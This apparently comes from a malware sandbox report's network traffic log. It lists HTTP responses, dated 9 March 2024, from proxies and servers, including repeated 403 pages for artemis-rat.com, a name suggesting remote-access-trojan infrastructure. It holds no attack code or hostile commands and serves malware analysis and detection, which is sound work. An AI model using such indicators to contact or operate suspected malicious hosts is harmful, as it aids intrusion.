3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
